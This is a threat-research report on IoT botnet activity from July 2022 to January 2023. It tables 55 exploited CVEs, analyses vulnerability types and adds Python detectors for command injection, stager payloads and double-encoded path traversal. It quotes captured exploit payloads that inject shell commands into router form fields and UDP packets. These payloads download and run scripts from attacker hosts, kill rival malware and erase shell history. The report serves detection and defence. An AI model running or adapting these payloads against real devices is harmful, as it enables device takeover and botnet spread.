
THE 2022-2023 IOT BOTNET REPORT
VULNERABILITIES TARGETED

The 2022-2023 IoT Botnet Report – Vulnerabilities Targeted
Copyright © 2023 CUJO LLC

Introduction

This report investigates the IoT botnet activity we've observed in consumer networks protected by CUJO AI from early July 2022 to the end of January 2023. For more insights into our research, visit the CUJO AI blog and the ISP security hub.

Most Internet of Things (IoT) devices have limited resources, Unix-like operating systems and inadequate cybersecurity measures. The latter, combined with the often short and neglected software support cycles from device manufacturers, provides a significant breeding ground for cybercriminals, who are keen to take advantage of the situation.

Table of Contents

Introduction
IoT Threats
What Are We Calling a Botnet?
How Botnets Work
Previous Botnet Report
The 2022-2023 IoT Botnet Report: Summary
List of Exploited Vulnerabilities
Vulnerability Type Distribution by CWE
It's All About Command Injection
Specific Vulnerabilities Targeted
Top 10 Vulnerabilities Exploited in 2021 vs 2022/2023
New Exploited Vulnerabilities
Vulnerability Distribution by Disclosure Year: New vs Old Exploits
Sets of Exploits
How CUJO AI Protects Internet Users Against Botnets


IoT Threats

Our latest annual cybersecurity report shows that while IP cameras make up only 1.2% of all devices monitored and protected by CUJO AI, they are targeted by 24% of all malicious activities. The following popular manufacturers' devices are targeted by the most threats on average:

Seagate (NAS products)
Speco Technologies (CCTV, DVR products)
QNAP (NAS products)
Hikvision (IP Camera, DVR products)

The Internet of Things (IoT) landscape consists of billions of devices connected to the Internet, and various forecasts suggest that their number will only grow in the coming years. IoT devices come in many different forms: smart home appliances, printers, IP cameras, routers, various sensors, and the list goes on. From a more technical point of view, any device with an IP address which is not managed like a typical desktop computer, laptop, or smartphone can be considered an IoT device.


What Are We Calling a Botnet?

Since we'll be discussing botnet-related threats, we should start with a definition of what a botnet is. A botnet is a network of devices infected by specific malware, where devices can be controlled by the operator of the malware. This specific type of malware is also referred to as a "botnet", which is the meaning we are using here from now on.

How Botnets Work

The anatomy of a typical botnet-related attack on IoT devices hasn't changed much in the past couple of years, and we have detailed it in a previous article. In short, it involves a stager shell script, which downloads and starts executing the malware binaries. The binary names generally include the CPU architecture they are compiled for. Most of the malware observed in the IoT landscape are variants of the infamous Mirai or Gafgyt botnets, but malware written in Go is on the rise too, with Sysrv and Zerobot as prime examples of this.

Two of the main vectors for the spread of botnets are:

1. Brute-forcing weak login credentials
2. Exploiting known software vulnerabilities

In general, the first one is the more common method, as noted in our previous report: "poor quality IoT devices often come with hard-coded, default passwords that are not changed by the user or, when a password change is enforced, changed to an easy to remember (and therefore quickly brute-forceable) password". The problem remains prevalent today.

Previous Botnet Report

Our previous report covered a 4-month period in 2021 and found that only 8% of the samples contained exploits. Of those, 83% used two or more vulnerability exploits. In total, we had found 20 different vulnerabilities being targeted, with most of them disclosed in 2018 or earlier.


The 2022-2023 IoT Botnet Report: Summary

Between early July 2022 and the end of January 2023, 6,471 different ELF binaries were classified as malicious and 1,685 (26%) contained at least 1 exploit of a vulnerability, which is a major increase from 8% in 2021. In total, 55 vulnerabilities are being exploited, more than twice as many as in 2021.

By looking at the Common Weakness Enumerations (CWEs), a community-developed list of hardware and software vulnerability types assigned to the vulnerabilities, we've observed some variation from the 100% "Injection" type vulnerabilities we'd seen earlier. However, even when the CWE category is technically different, the goal of the malware is almost always the same: to remotely run commands on the targeted system. The one real outlier is CVE-2021-4034, which enables local privilege escalation.

There are three new entries among the top 10 most exploited vulnerabilities. However, CVE-2017-17215 is by far the most frequently seen exploit in malware: it is used by 1,625 out of 1,685 exploit-containing binaries. Of the more frequently seen newly exploited vulnerabilities, all are tied to the Zerobot botnet, but two are also exploited by other malware.

The distribution of vulnerabilities by their year of disclosure shows some major shifts compared to our last report, as more recent (disclosed within two years prior to this report) vulnerabilities are represented in much greater numbers, although few malware binaries exploit them.

Fewer malware binaries use two or more exploits – 40% in 2022-23 versus 83% in 2021. In total, 36 different exploit sets are observed and Zerobot equips the largest exploit set with 22 entries.

Only 6 out of 36 exploit sets discovered during our research include exploits for recently disclosed (within two years prior to this report) vulnerabilities. Four of these sets are made up of around 50% or more exploits targeting recent vulnerabilities. We have explicitly named and listed these four sets along with their malware, since they are the most innovative in terms of exploiting fresh vulnerabilities.


List of Exploited Vulnerabilities

This is a list of all the exploited vulnerabilities we've detected between early July 2022 and the end of January 2023. The Vulnerability Type column is based on the Common Weakness Enumeration (CWE). We are also listing the affected device or software types with specific models or version names.

| CVE | Vulnerability name | Vulnerability type (CWE) | Affected device/software type |
|---|---|---|---|
| CVE-2007-3010 | Alcatel OmniPCX Unified Maintenance Tool "masterCGI" Unauthenticated Remote Command Execution via 'user' parameter | Improper Input Validation | Software (Unified Maintenance Tool in Alcatel OmniPCX Enterprise Communication Server) |
| - | Netgear "setup.cgi" Unauthenticated Remote Command Execution | Command Injection | Router (Netgear DGN1000, DGN2000) |
| - | ZTE ZXV10 H108L "manager_dev_ping_t.gch" Remote Command Execution | Command Injection | Router (ZTE ZXV10 H108L) |
| CVE-2013-7471 | D-Link UPnP "soap.cgi" Unauthenticated Remote Command Execution | Command Injection | Router (D-Link DIR-300, DIR-600, DIR-645, DIR-845, DIR-865) |
| - | Linksys "tmUnblock.cgi" Unauthenticated Remote Command Execution | Command Injection | Router (Linksys E-series) |
| CVE-2014-2321 | ZTE Cable Modem "web_shell_cmd.gch" Unauthenticated Remote Command Execution | Command Injection (disagrees) | Modem (ZTE F460, F660) |
| CVE-2014-3206 | Seagate BlackArmor NAS "localJob.php" Unauthenticated Remote Command Execution | Improper Input Validation | NAS (Seagate BlackArmor NAS 110, 220) |
| CVE-2014-8361 | Realtek SDK miniigd UPnP SOAP "wanipcn.xml"/"picsdesc.xml" Unauthenticated Command Execution | Improper Input Validation | Software (Realtek SDK), Router (multiple products in D-Link DIR-series) |
| CVE-2014-9118 | DASAN Zhone "zhnping.cmd" Authenticated Remote Command Execution via 'ipAddr' parameter | Command Injection | Router (DASAN Zhone zNID GPON 2426A) |
| CVE-2015-2051 | Unauthenticated Remote Command Execution via the "GetDeviceSettings" action to the HNAP interface | Command Injection | Router (D-Link DIR-645) |
| - | AVTECH Remote Command Execution via "Search.cgi" (unauthenticated), "CloudSetup.cgi" (authenticated) or "adcommand.cgi" (authenticated) pages | Command Injection | IP camera, NVR, DVR (AVTECH) |
| - | VACRON NVR "board.cgi" Remote Command Execution via 'cmd' parameter | Command Injection | NVR (VACRON) |
| - | CCTV/DVR "language/Swedish" Remote Command Execution | Command Injection | DVR, CCTV (more than 70 vendors) |
| CVE-2016-6277 | Netgear "cgi-bin/;" Unauthenticated Remote Command Execution | Command Injection (disagrees) | Router (multiple products in Netgear R-series and D-series) |
| CVE-2016-10372 | ZyXEL/eir D1000 "UD/act?" Unauthenticated Remote Command Execution | Command Injection | Modem (ZyXEL/eir D1000) |
| CVE-2016-20016 | JAWS web server "/shell" Unauthenticated Remote Command Execution | Command Injection | DVR (MVPower TV-7104HE, TV-7108HE) |
| CVE-2016-20017 | D-Link "login.cgi" Unauthenticated Remote Command Execution via 'cli' parameter | Command Injection | Router (D-Link DSL-2750B) |
| CVE-2017-5638 | Apache Struts 2 Unauthenticated Remote Command Execution via OGNL Injection | Improper Input Validation | Software (Apache Struts 2) |
| CVE-2017-17215 | Huawei HG532 "DeviceUpgrade_1" Authenticated Remote Command Execution | Improper Input Validation | Router (Huawei HG532) |
| CVE-2017-18368 | Zyxel "ViewLog.asp" router Unauthenticated Remote Command Execution via 'remote_host' parameter | Command Injection | Router (Zyxel P660HN) |
| CVE-2017-18377 | WIFICAM IP camera "set_ftp.cgi" Unauthenticated Remote Command Execution | Command Injection | IP camera (WIFICAM) |
| CVE-2018-10561/10562 | Dasan GPON Routers "GponForm/diag_Form" Authentication Bypass and Command Injection vulnerabilities via 'dest_host' parameter | Improper Authentication and Command Injection | Router (Dasan GPON) |
| CVE-2018-10823 | D-Link "chkisg.htm" Authenticated Remote Command Execution via 'Sip' parameter | Command Injection | Router (multiple D-Link DWR-series) |
| CVE-2018-17173 | LG SuperSign CMS "getThumbnail" Unauthenticated Remote Command Execution via 'sourceUri' parameter | Command Injection | Software (LG SuperSign) |
| CVE-2018-20057 | D-Link "formSysCmd" Authenticated Remote Command Execution via 'sysCmd' parameter | Command Injection | Router (D-Link DIR-619L, DIR-605L, Sapido RB-1732) |
| CVE-2018-20062 | NoneCMS v1.3 ThinkPHP "index.php" Unauthenticated Remote Command Execution via 'invokefunction' parameter | Improper Input Validation | Software (NoneCMS v1.3, ThinkPHP) |
| CVE-2020-7209 | LinuxKI Unauthenticated Remote Command Execution | Command Injection | Software (LinuxKI) |
| CVE-2020-8515 | DrayTek Vigor2960 "mainfunction.cgi" Unauthenticated Remote Command Execution via 'keyPath' parameter | Command Injection | Firewall (DrayTek Vigor2960) |
| CVE-2020-8958 | OptiLink GPON "formPing"/"formTracert" Authenticated Remote Command Execution via 'target_addr' parameter | Command Injection | Router (Guangzhou 1GE ONU V2801RW, V2804WR and OptiLink ONT1GEW) |
| CVE-2020-9054 | ZyXEL NAS-series "weblogin.cgi" Unauthenticated Remote Command Execution via 'username' parameter | Command Injection | NAS (multiple products in ZyXEL NAS-series) |
| CVE-2020-10173 | Multiple Authenticated Command Injection vulnerabilities in Comtrend VR-3033 routers via "ping.cgi" page and 'pingIpAddress' parameter | Command Injection | Router (Comtrend VR-3033) |
| CVE-2020-10987 | Tenda "setUsbUnload" Unauthenticated Remote Command Execution via 'deviceName' parameter | Command Injection | Router (Tenda AC15, AC1900) |
| CVE-2020-17456 | Seowon "system_log.cgi" Unauthenticated Remote Command Execution via 'ipAddr' parameter | Command Injection | Router (Seowon Intech SLC-130, SLR-120S) |
| CVE-2020-25506 | D-Link "system_mgr.cgi" Unauthenticated Remote Command Execution | Command Injection | Router (D-Link DNS-320) |
| - | PHP 8.1.0-dev Backdoor Remote Command Execution | Command Injection | Software (PHP 8.1.0-dev) |
| CVE-2021-4034 | Local privilege escalation vulnerability in polkit's pkexec utility | Out-of-bounds Read/Write | Software (polkit pkexec utility) |
| CVE-2021-4039 | ZyXEL "login.html" Unauthenticated Remote Command Execution via 'myname' parameter | Command Injection | Router (ZyXEL NWA-1100-NH) |
| CVE-2021-35394 | Realtek Jungle SDK "orf;" Unauthenticated Remote Command Execution | Command Injection and Out-of-bounds Write | Software (Realtek Jungle SDK) |
| CVE-2021-35395 | Realtek Jungle SDK Unauthenticated Command Injection vulnerabilities in "formSysCmd" and "formWsc" pages | Command Injection and Out-of-bounds Write | Software (Realtek Jungle SDK) |
| CVE-2021-36260 | Hikvision web server "SDK/webLanguage" Unauthenticated Remote Command Execution | Command Injection | IP camera (multiple products in Hikvision DS-2CD series) |
| CVE-2021-41773 | Apache web server Unauthenticated Path Traversal | Path Traversal | Software (Apache HTTP server) |
| CVE-2021-42013 | Apache web server Unauthenticated Path Traversal No. 2 after an incomplete fix for CVE-2021-41773 | Path Traversal | Software (Apache HTTP server) |
| CVE-2021-44228 | Apache Log4j Unauthenticated Command Execution | Expression Language Injection | Software (Apache Log4j) |
| CVE-2021-46422 | Telesquare "admin.cgi" Unauthenticated Remote Command Execution via 'Cmd' parameter | Command Injection | Router (Telesquare SDT-CW3B1) |
| - | Adobe ColdFusion 11 Unauthenticated JNDI attack via 'verifyldapserver' method | Deserialization of Untrusted Data | Software (Adobe ColdFusion) |
| CVE-2022-1388 | F5 BIG-IP Authentication Bypass in "mgmt/tm/util/bash" page via 'run' command and 'utilCmdArgs' parameter | Missing Authentication for Critical Function | Firewall (F5 BIG-IP) |
| CVE-2022-22947 | Spring Cloud Gateway Unauthenticated Command Injection | Command Injection | Software (Spring Cloud Gateway) |
| CVE-2022-22965 | "Spring4Shell" Unauthenticated Command Injection | Command Injection | Software (Spring MVC/Spring WebFlux) |
| CVE-2022-25075 | TOTOLINK "downloadFlile.cgi" Unauthenticated Remote Command Execution via 'payload' parameter | Command Injection | Router (TOTOLINK A3000RU) |
| CVE-2022-26186 | TOTOLINK "cstecgi.cgi" Unauthenticated Remote Command Execution via 'exportOvpn' interface and 'command' parameter | Command Injection | Router (TOTOLINK N600R) |
| CVE-2022-26210 | TOTOLINK "cstecgi.cgi" Unauthenticated Remote Command Execution via 'setUpgradeFW' function and 'FileName' parameter | Command Injection | Router (multiple products in TOTOLINK A-series) |
| CVE-2022-29013 | Razer Sila Unauthenticated Remote Command Execution in "ubus" page by 'call' method and 'command' parameter | Command Injection | Router (Razer Sila) |
| CVE-2022-30525 | ZyXEL firewall Unauthenticated Remote Command Execution via "setWanPortSt" command and 'mtu' parameter | Command Injection | Firewall (multiple products in ZyXEL USG FLEX-series) |
| CVE-2022-34538 | Digital Watchdog "addacph.cgi" Authenticated Remote Command Execution via multiple parameters | Command Injection | IP camera (Digital Watchdog DW MEGApix) |
| CVE-2022-37061 | FLIR "res.php" Unauthenticated Remote Command Execution via "alarm" action and 'id' parameter | Command Injection | Thermal sensor camera (FLIR AX8) |

Vulnerability Type Distribution by CWE

Here's how the vulnerability types are distributed based on the CWE list:

[Figure] Vulnerability type distribution by CWE. Bar chart; categories in the order shown: Command Injection, Improper Input Validation, Out-of-bounds Write, Path Traversal, Missing Authentication for Critical Function, Deserialization of Untrusted Data, Expression Language Injection, Out-of-bounds Read, Improper Authentication. Horizontal axis: number of vulnerabilities, 0 to 45 in steps of 5.

It's All About Command Injection

Most of the vulnerabilities map onto the Injection category in the OWASP Top 10 Web Application Security Risks list, where 'Injection' includes Command Injection, Improper Input Validation and Expression Language Injection. This is not surprising, since the case was similar in our last report.

Exploiting this type of vulnerability is most often quite simple, as it requires only one or a few specially crafted and parameterized HTTP requests that already contain the commands to be executed on the targeted system. These commands – the 'exploit code' – often download and execute a stager script or the malicious binaries themselves. Another factor that contributes to the low attack complexity for most of the vulnerabilities we observed is that even an unauthenticated user can execute a fully working exploit.

There are nine vulnerabilities that have CWEs outside of the Injection category, like Out-of-bounds Read/Write or Path Traversal. These are described in more detail below; however, whatever their CWEs are technically, the threat actor can achieve command injection by exploiting eight of them.


CVE-2018-10561 and 10562 are always exploited together. The first one has the Improper Authentication CWE, which states that one can bypass authentication by appending "?images" to any URL that requires authentication on certain Dasan GPON routers. CVE-2018-10562 says that the diag_Form page with the dest_host form parameter can run arbitrary commands on the system. Thus, the following exploit is born.

Exploit for CVE-2018-10561/10562 taken from [2]

    POST /GponForm/diag_Form?images/ HTTP/1.1
    Host: 127.0.0.1:8080
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    Accept: */*
    User-Agent: Hello, World
    Content-Length: 118

    XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+34/ohshit.sh+-O+/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
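The two CVEs above combine an authentication bypass in the URL with a shell command smuggled into a form field, and the same shape recurs throughout the list of exploited vulnerabilities: a parameter that should hold a hostname, a PIN or a file name suddenly contains a command separator and a download. The following Python is an added example written for this page, not code from the report, from CUJO AI or from any of the malware families discussed. It parses a raw HTTP request, percent-decodes the query and form parameters and flags the ones that carry shell syntax or stager vocabulary, and separately flags the GPON "?images" bypass. The sample requests are constructed here (RFC 5737 documentation addresses, made-up script names); restricting the bypass check to /GponForm/ is an assumption of the example, made so that unrelated sites with an "images" query are not flagged.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Characters that end or chain a command once a parameter is pasted into a
# shell line such as `ping -c 1 <dest_host>`: separators, pipes, backticks
# and $(...) substitution.
SHELL_META = re.compile(r"[;|&`]|\$\(")
# Download-and-execute vocabulary of IoT stagers: fetch into /tmp, mark
# executable, run (directly or through busybox).
STAGER_WORDS = re.compile(r"\b(?:wget|curl|tftp|busybox|chmod)\b|/tmp/")


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def parse_form(encoded: str):
    """Yield (name, value) pairs from x-www-form-urlencoded data.

    Pairs are split on '&' only and percent-decoded by hand: some urllib
    versions also split on ';', which would cut the injected command out of
    the very value we want to inspect.
    """
    for pair in encoded.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote_plus(name), unquote_plus(value)


def analyze(raw: str) -> dict:
    """Flag parameters carrying shell syntax and the GPON '?images' bypass."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    params = [("query", n, v) for n, v in parse_form(url.query)]
    if body and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params += [("body", n, v) for n, v in parse_form(body)]

    injected = [
        {"where": where, "param": name, "value": value}
        for where, name, value in params
        if SHELL_META.search(value) or STAGER_WORDS.search(value)
    ]
    # CVE-2018-10561: appending "?images" to a page that needs a login skips
    # the check. Limiting the match to /GponForm/ is this example's assumption.
    bypass = url.path.startswith("/GponForm/") and url.query.startswith("images")
    return {"method": method, "path": url.path, "auth_bypass": bypass, "injected": injected}


# Constructed samples (not captured traffic): RFC 5737 addresses, made-up names.
GPON_REQUEST = (
    "POST /GponForm/diag_Form?images/ HTTP/1.1\r\n"
    "Host: 192.0.2.10:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "XWebPageName=diag&diag_action=ping&wan_conlist=0"
    "&dest_host=``;busybox+wget+http://192.0.2.200/s.sh+-O+/tmp/s;sh+/tmp/s&ipv=0"
)
WSC_REQUEST = (
    "POST /goform/formWsc HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "submit-url=%2Fwlwps.asp&resetUnCfg=0"
    "&peerPin=12345678;wget+http://192.0.2.200/z.sh;chmod+755+z.sh;sh+z.sh;"
    "&setPIN=Start+PIN&configVxd=off"
)
BENIGN_REQUEST = (
    "POST /GponForm/diag_Form HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=192.0.2.50&ipv=0"
)

if __name__ == "__main__":
    for sample in (GPON_REQUEST, WSC_REQUEST, BENIGN_REQUEST):
        print(analyze(sample))
```

The useful signal is not the request path alone but the type mismatch: dest_host and peerPin are supposed to be a hostname and an eight-digit PIN, so a single ';' or backtick in them is already a verdict, and the decoded value then hands you the stager URL for blocking.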

CVE-2021-4034 is the one real outlier because it enables local privilege escalation, i.e., it allows the attacker to run commands as root on an already infected system, and is also a memory corruption vulnerability in its nature. The vulnerable software is polkit's pkexec utility, which can be found on every major Linux distribution by default. It involves the reintroduction of "unsecure" environment variables to pkexec's environment, such as "GCONV_PATH". These variables enable the attacker to run arbitrary commands as root, which are first compiled into a shared library file. The following screenshots show the use of GCONV_PATH and main.write_gconv_module(), which is responsible for the shared library file. You can find more detail about the vulnerability here.

[Figure] Indicators for a CVE-2021-4034 exploit taken from [9]


CVE-2021-35394 and 35395 describe vulnerabilities in the Realtek Jungle SDK, which is a package of binaries supplied with specific Realtek SoCs (systems-on-chip) used by multiple router manufacturers. The exploit for CVE-2021-35394 is a little different from other exploits targeting Command Injection vulnerabilities, since it does not use an HTTP request, but rather a specifically formed UDP packet sent to a router's port 9034 on a LAN IP address.

    orf;cd /tmp;rm -rf mpsl;cd /tmp;/bin/busybox wget 88/mipsel && chmod +x mipsel && ./mipsel
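The UDP payload above is a plain command chain, and the How Botnets Work section noted that the binaries it fetches carry the CPU architecture in their names. The following Python is an added triage helper for such payloads, not code from the report or from any of the malware it describes: it splits a captured payload on the separators the stagers chain with (;, && and ||), pulls out each download URL, the name the file is saved under and the architecture implied by the binary name, records which files are then executed, and marks a payload that starts with the Realtek "orf;" prefix. The architecture tokens, including the Mirai-style short forms mpsl and spc, are an assumption of the example and not an exhaustive list; both sample payloads are constructed with RFC 5737 addresses and are not the report's captures.

```python
import re
from urllib.parse import urlsplit

# Separators the stagers chain commands with. A single '|' (pipe) and a
# trailing '&' are deliberately left inside the command they belong to.
SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||\r?\n)\s*")
URL_RE = re.compile(r"https?://[^\s;|&'\"]+")
FETCHER = re.compile(r"\b(?:wget|curl|tftp)\b")
SAVE_AS = re.compile(r"\s-[oO]\s+(\S+)")   # wget -O name / curl -o name
# "./name", "sh name", "/bin/sh name", "busybox sh name", "/bin/bash name"
EXEC = re.compile(r"^(?:\./|(?:/bin/)?(?:busybox\s+)?(?:ba)?sh\s+)(\S+)")

# Architecture tokens, most specific first so that "mipsel" is not read as
# "mips" and "x86_64" is not read as "x86". "mpsl" and "spc" follow the
# Mirai family's naming habit; this list is an assumption, not a standard.
ARCH_PATTERNS = [
    (re.compile(r"mipsel|mpsl", re.I), "mipsel"),
    (re.compile(r"mips", re.I), "mips"),
    (re.compile(r"x86_64|x64|amd64", re.I), "x86_64"),
    (re.compile(r"x86|i[3-6]86", re.I), "x86"),
    (re.compile(r"aarch64|arm64", re.I), "aarch64"),
    (re.compile(r"arm", re.I), "arm"),
    (re.compile(r"ppc|powerpc", re.I), "ppc"),
    (re.compile(r"sh4", re.I), "sh4"),
    (re.compile(r"m68k", re.I), "m68k"),
    (re.compile(r"sparc|spc", re.I), "sparc"),
]


def guess_arch(name: str) -> str:
    """Map a binary or URL basename to the architecture its name suggests."""
    for pattern, arch in ARCH_PATTERNS:
        if pattern.search(name):
            return arch
    return "unknown"


def split_commands(payload: str) -> list:
    """Break a command chain into individual commands, dropping empty pieces."""
    return [c.strip() for c in SEPARATORS.split(payload) if c.strip()]


def triage(payload: str) -> dict:
    """Summarize a stager payload: downloads, architectures, executed files."""
    commands = split_commands(payload)
    downloads, executed = [], []
    for cmd in commands:
        url_match = URL_RE.search(cmd)
        if url_match and FETCHER.search(cmd):
            url = url_match.group(0)
            basename = urlsplit(url).path.rsplit("/", 1)[-1]
            save = SAVE_AS.search(cmd)
            downloads.append({
                "url": url,
                "saved_as": save.group(1) if save else basename,
                "arch": guess_arch(basename),   # the URL name carries the arch
            })
        run = EXEC.match(cmd)
        if run:
            executed.append(run.group(1))
    return {
        "realtek_orf": payload.startswith("orf;"),  # CVE-2021-35394 UDP prefix
        "commands": commands,
        "downloads": downloads,
        "executed": executed,
    }


# Constructed samples (not the report's captures): RFC 5737 addresses.
UDP_SAMPLE = ("orf;cd /tmp;rm -rf mpsl;cd /tmp;/bin/busybox wget "
              "http://192.0.2.200:88/mipsel && chmod +x mipsel && ./mipsel")
HTTP_STAGER_SAMPLE = ("cd /tmp || cd /var/run; "
                      "wget http://192.0.2.200/bins/arm7 -O a7; chmod 777 a7; ./a7; "
                      "wget http://192.0.2.200/bins/x86 -O x; chmod 777 x; ./x")

if __name__ == "__main__":
    for sample in (UDP_SAMPLE, HTTP_STAGER_SAMPLE):
        print(triage(sample))
```

Two things fall out of the summary that the raw string hides: the set of architectures tells you which device classes the campaign is built for, and the saved-as name is what to look for on disk, since it is often not the name in the URL.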

CVE-2021-35395, on the other hand, uses a normal HTTP request sent to /goform/formWsc, where the form data's peerPin parameter contains the exploit commands. This vulnerability can also be exploited with another page, called "formSysCmd", and its form data parameter sysCmd. The 'goform' part corresponds to the GoAhead web server, used as a base for the router management web interface. There also are Boa web server-based implementations, which would translate to 'boafrm' in the page path.

Exploit for CVE-2021-35395 taken from [5]

    POST /goform/formWsc
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Connection: close

    submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;wget http://zero.sudolite.ml/zero.sh||curl -o http://zero.sudolite.ml/zero.sh||curl -O http://zero.sudolite.ml/zero.sh;killall i.i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox;history -c;rm ~/.bash_history;chmod 755 zero.sh;/bin/bash zero.sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=

At least two other CVEs (CVE-2018-20057 and CVE-2019-19824) can be traced back to CVE-2021-35395 since they describe product-specific vulnerabilities for the same web pages and form parameters, although the core problem lies in the Realtek Jungle SDK, which is used in the products with these vulnerabilities. This issue is described in detail in Onekey's blog post.

CVE-2021-41773 and CVE-2021-42013 belong to the Path Traversal CWE. Both impact the Apache HTTP web server, and CVE-2021-42013 exists because the fix for CVE-2021-41773 was incomplete. The example exploits from the Zerobot malware ([5]) act in the same way: start bash and execute the commands in the form data section, where the part marked in red is essential and is base64 encoded in the actual requests. It should be noted that in the Zerobot binary the relevant Go method that implements these exploits is called CVE-2018-12613, which is a completely different vulnerability not exploited by Zerobot.


Exploits for CVE-2021-41773 and CVE-2021-42013 taken from [5]

    wget http://zero.sudolite.ml/zero.sh||curl -o http://zero.sudolite.ml/zero.sh||curl -O http://zero.sudolite.ml/zero.sh;killall i.i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox;history -c;rm ~/.bash_history;chmod 755 zero.sh;/bin/bash zero.s
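The "incomplete fix" behind the second Apache CVE is a normalization problem, and it is worth seeing in code: a filter that percent-decodes a path once and then looks for ".." never sees a dot segment whose '%' was itself percent-encoded, because that segment only turns into ".." on the second decode. The following Python is an added example written for this page, not code from the report, from Zerobot or from Apache. It resolves a request path two ways, once after a single decode and once after decoding to a fixed point, and reports when the two disagree about whether the path climbs above the root. The report does not reproduce the request paths Zerobot sent, so the sample paths are constructed from the public descriptions of the two CVEs (a single-encoded and a double-encoded dot segment under /cgi-bin/); the /bin/sh target in them is illustrative.

```python
from urllib.parse import unquote


def percent_decode(path: str, rounds: int) -> str:
    """Percent-decode up to `rounds` times, stopping early once nothing changes.

    The bound matters: an attacker can nest encodings (%2525...) and an
    unbounded loop would be a cheap denial of service against the filter.
    """
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def resolve_dots(path: str):
    """Collapse '.' and '..' segments; report whether '..' climbed above '/'."""
    stack, escaped = [], False
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if stack:
                stack.pop()
            else:
                escaped = True   # more '..' than directories: left the root
            continue
        stack.append(segment)
    return "/" + "/".join(stack), escaped


def classify(raw_path: str, max_rounds: int = 3) -> dict:
    """Compare a single-decode check with a fixed-point decode of the same path."""
    single, esc_single = resolve_dots(percent_decode(raw_path, 1))
    full, esc_full = resolve_dots(percent_decode(raw_path, max_rounds))
    return {
        "single_pass": single,
        "single_pass_traversal": esc_single,
        "full": full,
        "full_traversal": esc_full,
        # True exactly when a once-decoding filter would wave the request through
        "missed_by_single_pass": esc_full and not esc_single,
    }


# Constructed sample paths, built from the public CVE descriptions (illustrative).
SINGLE_ENCODED = "/cgi-bin/.%2e/.%2e/.%2e/bin/sh"        # '.%2e' -> '..' after one decode
DOUBLE_ENCODED = "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/bin/sh"  # '%%32%65' -> '%2e' -> '.'
BENIGN = "/icons/../index.html"                            # '..' that stays inside the root

if __name__ == "__main__":
    for sample in (SINGLE_ENCODED, DOUBLE_ENCODED, BENIGN):
        print(sample, "->", classify(sample))
```

The practical rule this demonstrates is to canonicalize before checking, and to canonicalize to a fixed point rather than a fixed number of passes; any filter that checks then decodes, or decodes exactly once then checks, leaves the same gap the second CVE exploited.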
